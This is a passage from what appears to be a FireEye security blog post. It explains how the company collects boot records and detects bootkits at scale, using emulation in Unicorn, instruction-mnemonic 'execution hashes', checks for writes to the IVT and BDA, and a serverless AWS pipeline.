cases for applications such as Altiris, SafeBoot, and PGPGuard. This
required small adjustments to the algorithm for each environment,
which in turn required reverse engineering many records to find the
appropriate offsets to hash.
Ultimately, we concluded that to solve the problem we needed a
solution that provided the following:
A reliable collection of boot records from systems
A behavioral analysis of boot records, not just static analysis
The ability to analyze tens of thousands of boot records in a timely manner
The remainder of this post describes how we solved each of these challenges.
Collect the Bytes
Malicious drivers insert themselves into the disk driver stack so
they can intercept disk I/O as it traverses the stack. They do this to
hide their presence (the real bytes) on disk. To address this attack
vector, we developed a custom kernel driver (henceforth, our “Raw
Read” driver) capable of targeting various altitudes in the disk
driver stack. Using the Raw Read driver, we identify the lowest level
of the stack and read the bytes from that level (Figure 1).
Figure 1: Malicious driver inserts itself
as a filter driver in the stack, raw read driver reads bytes from
lowest level
This allows us to bypass the rest of the driver stack, as well as
any user space hooks. (It is important to note, however, that if the
lowest driver on the I/O stack has an inline code hook an attacker can
still intercept the read requests.) Additionally, we can compare the
bytes read from the lowest level of the driver stack to those read
from user space. Introducing our first indicator of a compromised
boot system: the bytes retrieved from user space don’t match those
retrieved from the lowest level of the disk driver stack.
Analyze the Bytes
As previously mentioned, reverse engineering and static analysis are
impractical when dealing with hundreds of thousands of boot records.
Automated dynamic analysis is a more practical approach, specifically
through emulating the execution of a boot record. In more technical
terms, we are emulating the real mode instructions of a boot record.
The emulation engine that we chose is the Unicorn project. Unicorn
is based on the QEMU emulator and supports 16-bit real mode emulation.
As boot samples are collected from endpoint machines, they are sent to
the emulation engine where high-level functionality is captured during
emulation. This functionality includes events such as memory access,
disk reads and writes, and other interrupts that execute during emulation.
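A minimal sketch of that setup with Unicorn's Python bindings might look like the following: map the 1 MB real-mode address space, load the 512-byte record at 0000:7C00h where the BIOS would place it, hook software interrupts, and bound the run. A production harness would also need to service (or skip over) interrupts such as int 13h disk reads; the file name and register values here are illustrative assumptions.

```python
from unicorn import Uc, UC_ARCH_X86, UC_MODE_16, UC_HOOK_INTR
from unicorn.x86_const import UC_X86_REG_SP, UC_X86_REG_DL, UC_X86_REG_IP

BOOT_ADDR = 0x7C00

def hook_intr(uc, intno, user_data):
    # Record BIOS interrupts (e.g. int 13h disk services) as high-level events.
    print("int 0x%02x at 0x%04x" % (intno, uc.reg_read(UC_X86_REG_IP)))

with open("mbr.bin", "rb") as f:   # hypothetical path to a collected boot record
    record = f.read(512)

uc = Uc(UC_ARCH_X86, UC_MODE_16)
uc.mem_map(0, 0x100000)            # map the 1 MB real-mode address space
uc.mem_write(BOOT_ADDR, record)    # BIOS loads the boot sector at 0000:7C00h
uc.reg_write(UC_X86_REG_SP, 0x7000)
uc.reg_write(UC_X86_REG_DL, 0x80)  # DL = boot drive number
uc.hook_add(UC_HOOK_INTR, hook_intr)

# Bound the run; a real harness would also hook memory access and disk I/O.
uc.emu_start(BOOT_ADDR, BOOT_ADDR + len(record), timeout=5 * 1000 * 1000, count=100000)
```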
The Execution Hash
Folding down (aka stacking) duplicate samples is critical to reduce
the time needed on follow-up analysis by a human analyst. An
interesting quality of the boot samples gathered at scale is that
while samples are often functionally identical, the data they use
(e.g. strings or offsets) is often very different. This makes it quite
difficult to generate a hash to identify duplicates, as demonstrated
in Table 1. So how can we solve this problem with emulation? Enter the
“execution hash”. The idea is simple: during emulation, hash the
mnemonic of every assembly instruction that executes (e.g.,
“md5(‘and’ + ‘mov’ + ‘shl’ + ‘or’)”). Figure 2 illustrates this
concept of hashing the assembly instruction as it executes to
ultimately arrive at the “execution hash”.
Figure 2: Execution hash
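Building on the emulation sketch above, the execution hash can be approximated with a code hook that disassembles each instruction as it executes (Capstone in 16-bit mode is assumed here) and folds only its mnemonic into a running MD5:

```python
import hashlib
from capstone import Cs, CS_ARCH_X86, CS_MODE_16
from unicorn import UC_HOOK_CODE

cs = Cs(CS_ARCH_X86, CS_MODE_16)
exec_hash = hashlib.md5()

def hash_mnemonic(uc, address, size, user_data):
    # Disassemble the instruction about to execute and hash only its mnemonic,
    # so functionally identical samples with different data fold to one hash.
    for insn in cs.disasm(bytes(uc.mem_read(address, size)), address):
        exec_hash.update(insn.mnemonic.encode())

# `uc` is the Uc instance from the earlier setup sketch; add before emu_start().
uc.hook_add(UC_HOOK_CODE, hash_mnemonic)

# After emulation completes:
print("execution hash:", exec_hash.hexdigest())
```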
Using this method, the 650,000 unique boot samples we’ve collected
to date can be grouped into a little more than 300 unique execution
hashes. This reduced data set makes it far more manageable to identify
samples for follow-up analysis. Introducing our second indicator of
a compromised boot system: an execution hash that is only found on a
few systems in an enterprise!
Behavioral Analysis
Like all malware, suspicious activity executed by bootkits can vary
widely. To avoid the pitfall of writing detection signatures for
individual malware samples, we focused on identifying behavior that
deviates from normal OS bootstrapping. To enable this analysis, the
series of instructions that execute during emulation are fed into an
analytic engine. Let's look in more detail at an example of malicious
functionality exhibited by several bootkits that we discovered by
analyzing the results of emulation.
Several malicious bootkits we discovered hooked the interrupt vector
table (IVT) and the BIOS Data Area (BDA) to intercept system
interrupts and data during the boot process. This can provide an
attacker the ability to intercept disk reads and also alter the
maximum memory reported by the system. By hooking these structures,
bootkits can attempt to hide themselves on disk or even in memory.
These hooks can be identified by memory writes to the memory ranges
reserved for the IVT and BDA during the boot process. The IVT
structure is located at the memory range 0000:0000h to 0000:03FCh and
the BDA is located at 0040:0000h. The malware can hook the interrupt
13h handler to inspect and modify disk writes that occur during the
boot process. Additionally, bootkit malware has been observed
modifying the memory size reported by the BIOS Data Area in order to
potentially hide itself in memory.
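That detection maps naturally onto a memory-write hook in the same emulation harness. The sketch below flags any write landing in the IVT or BDA ranges given above; the BDA length used here is an assumption, and `uc` is the Uc instance from the earlier setup sketch.

```python
from unicorn import UC_HOOK_MEM_WRITE

IVT_START, IVT_END = 0x0000, 0x03FC   # interrupt vector table (0000:0000h - 0000:03FCh)
BDA_START, BDA_END = 0x0400, 0x04FF   # BIOS Data Area at 0040:0000h (length assumed)

def flag_ivt_bda_write(uc, access, address, size, value, user_data):
    # Boot code normally has no business rewriting the IVT or BDA; a write
    # into either range is flagged as a suspicious hooking attempt.
    if IVT_START <= address <= IVT_END or BDA_START <= address <= BDA_END:
        print("suspicious write: 0x%04x <- 0x%x (%d bytes)" % (address, value, size))

# `uc` is the Uc instance from the setup sketch; add before emu_start().
uc.hook_add(UC_HOOK_MEM_WRITE, flag_ivt_bda_write)
```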
This leads us to our final category of indicators of a compromised
boot system: detection of suspicious behaviors such as IVT hooking,
decoding and executing data from disk, suspicious screen output from
the boot code, and modifying files or data on disk.
Do it at Scale
Dynamic analysis gives us a drastic improvement when determining the
behavior of boot records, but it comes at a cost. Unlike static
analysis or hashing, it is orders of magnitude slower. In our cloud
analysis environment, the average time to emulate a single record is
4.83 seconds. Using the compromised enterprise network that contained
ROCKBOOT as an example (approximately 20,000 boot records), it would
take more than 26 hours to dynamically analyze (emulate) the records
serially! In order to provide timely results to our analysts we needed
to easily scale our analysis throughput relative to the amount of
incoming data from our endpoint technologies. To further complicate
the problem, boot record analysis tends to happen in batches, for
example, when our endpoint technology is first deployed to a new enterprise.
With the advent of serverless cloud computing, we had the
opportunity to create an emulation analysis service that scales to
meet this demand – all while remaining cost effective. One of the
advantages of serverless computing versus traditional cloud instances
is that there are no compute costs during inactive periods; the only
cost incurred is storage. Even when our cloud solution receives tens
of thousands of records at the start of a new customer engagement, it
can rapidly scale to meet demand and maintain near real-time detection
of malicious bytes.
The cloud infrastructure we selected for our application is Amazon
Web Services (AWS). Figure 3 provides an overview of the architecture.
Figure 3: Boot record analysis workflow
Our design currently utilizes:
API Gateway to provide a RESTful interface.
Lambda functions to do validation, emulation, analysis, as well as storage and retrieval of results.
DynamoDB to track progress of processed boot records through the system.
S3 to store boot records and emulation reports.
The architecture we created exposes a RESTful API that provides a
handful of endpoints. At a high level the workflow is:
Endpoint agents in customer networks automatically collect boot records using FireEye’s custom-developed Raw Read kernel driver (see “Collect the Bytes” described earlier) and return the records to FireEye’s Incident Response (IR) server.
The IR server submits batches of boot records to the AWS-hosted REST interface, and polls the interface for batched results.
The IR server provides a UI for analysts to view the aggregated results across the enterprise, as well as automated notifications when malicious boot records are found.
The REST API endpoints are exposed via AWS’s API Gateway, which then
proxies the incoming requests to a “submission” Lambda. The submission
Lambda validates the incoming data, stores the record (aka boot code)
to S3, and then fans out the incoming requests to “analysis” Lambdas.
The analysis Lambda is where boot record emulation occurs. Because
Lambdas are started on demand, this model allows for an incredibly
high level of parallelization. AWS provides various settings to
control the maximum concurrency for a Lambda function, as well as
memory/CPU allocations and more. Once the analysis is complete, a
report is generated for the boot record and the report is stored in
S3. The reports include the results of emulation and other metadata
extracted from the boot record (e.g., ASCII strings).
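As an illustration only, the skeleton of such an analysis Lambda might look like the sketch below; the bucket name, event layout, and emulate() helper are hypothetical stand-ins rather than FireEye's actual implementation.

```python
import json
import boto3

s3 = boto3.client("s3")
BUCKET = "boot-record-analysis"   # hypothetical bucket name

def emulate(record_bytes):
    """Hypothetical wrapper around the Unicorn-based emulation described earlier."""
    return {"execution_hash": "...", "events": []}

def lambda_handler(event, context):
    # The submission Lambda fans out one record key per invocation (assumed layout).
    key = event["record_key"]
    record = s3.get_object(Bucket=BUCKET, Key=key)["Body"].read()

    report = emulate(record)

    # Store the emulation report next to the record for the IR server to poll.
    s3.put_object(Bucket=BUCKET, Key=key + ".report.json", Body=json.dumps(report))
    return {"status": "complete", "key": key}
```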
As described earlier, the IR server periodically polls the AWS REST
endpoint until processing is complete, at which time the report is downloaded.
Find More Evil in Big Data
Our workflow for identifying malicious boot records is only
effective when we know what malicious indicators to look for, or what
execution hashes to blacklist. But what if a new malicious boot record
(with a unique hash) evades our existing signatures?
For this problem, we leverage our in-house big data platform engine
that we integrated into FireEye
Helix following the acquisition of X15 Software. By loading the
results of hundreds of thousands of emulations into the X15 engine,
our analysts can hunt through the results at scale and identify
anomalous behaviors such as unique screen prints, unusual initial jump
offsets, or patterns in disk reads or writes.
This analysis at scale helps us identify new and interesting samples
to reverse engineer, and ultimately helps us identify new detection
signatures that feed back into our analytic engine.
Conclusion
Within weeks of going live we detected previously unknown
compromised systems in multiple customer environments. We’ve
identified everything from ROCKBOOT and HDRoot!
bootkits to the admittedly humorous JackTheRipper,
a bootkit that spreads itself via floppy disk (no joke). Our system
has collected and processed nearly 650,000 unique records to date and
continues to find the evil needles (suspicious and malicious boot
records) in very large haystacks.
In summary, by combining advanced endpoint boot record extraction
with scalable serverless computing and an automated emulation engine,
we can rapidly analyze thousands of records in search of evil. FireEye
is now using this solution in both our Managed
Defense and Incident
Response offerings.
Acknowledgements
Dimiter Andonov, Jamin Becker, Fred House, and Seth Summersett
contributed to this blog post.